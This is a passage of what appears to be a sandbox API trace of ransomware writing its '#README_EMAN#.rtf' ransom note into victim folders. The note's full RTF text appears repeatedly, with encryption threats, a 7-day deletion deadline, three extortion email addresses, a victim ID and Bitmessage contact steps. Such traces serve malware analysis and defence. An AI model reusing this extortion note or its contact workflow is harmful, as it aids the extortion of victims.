{{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.169] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.169] CloseHandle (hObject=0x2ec) returned 1 [0291.169] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\#readme_eman#.rtf")) returned 0xffffffff [0291.169] GetLastError () returned 0x2 [0291.169] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.170] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.170] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 